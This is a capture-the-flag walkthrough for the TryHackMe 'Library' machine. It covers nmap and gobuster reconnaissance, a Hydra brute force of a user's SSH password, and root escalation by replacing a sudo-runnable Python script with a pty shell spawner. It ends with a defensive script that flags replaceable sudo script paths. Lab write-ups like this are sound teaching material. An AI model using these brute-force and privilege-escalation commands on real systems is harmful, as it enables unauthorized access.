Hello everyone! Today we are going to solve the TryHackMe machine Library.

First, connect to the THM network using the VPN and start the machine

Start with an Nmap scan to find the open ports and services running on the machine

Note: If you are running as root, you don’t need to use the sudo command

nmap -Pn 10.10.36.25

Perform an advanced scan to find the service versions running on the system (-A already enables script scanning and version detection, so -sC and -sV are redundant alongside it)

nmap -sC -sV -A 10.10.36.25

Let’s open the IP address in the browser to see what the web page shows

Start Gobuster to find any directories or hidden files present on the website

gobuster dir -u http://10.10.36.25/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html

Gobuster found nothing, but the website mentions that a post was made by a user called “meliodas”. We assume this is a valid username and try to brute-force the user's SSH password using Hydra

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.36.25 ssh

We successfully cracked the SSH password. Now try to log in using SSH

ssh meliodas@10.10.36.25

We successfully logged in as the meliodas user. Now search for the user flag

ls

cat user.txt

We found the user flag, and there is also a Python file called bak.py. Before looking at it, check the sudo permissions for the user meliodas

sudo -l

We have root permissions to execute any Python file on the system. Now open the bak.py file

cat bak.py

Check the file permissions for the bak.py file

ls -la

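It has root permissions. However, the file sits in our own home directory, and deleting a file only requires write access to the directory that contains it. So, delete that file and create a new Python file with the same name bak.py in the same directory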

rm bak.py

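echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py

This puts 'import pty; pty.spawn("/bin/sh")' in the bak.py file (use plain ASCII quotes in the command, since typographic quotes copied from a web page break it)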

Now execute the bak.py file

sudo python /home/meliodas/bak.py

We got the root shell and also the root flag
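The weakness behind this escalation is that sudo runs a script stored in a directory the user controls. The following check is an added example, not part of the original walkthrough: it walks from a script up through its parent directories and reports every component that a non-root account could modify or replace. The name replaceable_by and its parameters are hypothetical, and the comment about rm assumes /home/meliodas is owned by meliodas.

```python
import os
import stat
import sys
import tempfile


def replaceable_by(path, trusted_uids=(0,), stop="/"):
    """List (component, reason) for every part of `path`, from the file up to
    `stop`, that an account outside `trusted_uids` could modify or replace."""
    findings = []
    current = os.path.abspath(path)
    stop = os.path.abspath(stop)
    while True:
        st = os.lstat(current)
        is_dir = stat.S_ISDIR(st.st_mode)
        if stat.S_ISLNK(st.st_mode):
            findings.append((current, "symlink, audit its target too"))
        elif st.st_uid not in trusted_uids:
            # The owner of a directory can delete or rename entries in it,
            # whoever owns them (assumed reason rm bak.py worked above).
            findings.append((current, "owned by uid %d" % st.st_uid))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # Sticky directories (/tmp style) only let an entry's owner
            # or the directory's owner remove it.
            if not (is_dir and st.st_mode & stat.S_ISVTX):
                findings.append((current, "group/world writable"))
        parent = os.path.dirname(current)
        if current == stop or parent == current:
            return findings
        current = parent


if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        # Constructed sample: a script inside a world-writable directory.
        demo = tempfile.mkdtemp()
        os.chmod(demo, 0o777)
        targets = [os.path.join(demo, "bak.py")]
        open(targets[0], "w").close()
    for target in targets:
        for component, reason in replaceable_by(target):
            print("%s: %s" % (component, reason))
```

Run it against each script path that sudo -l lists for a user. It checks ownership and mode bits only, so ACLs still need a separate review.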

This concludes the room and both flags have been captured!
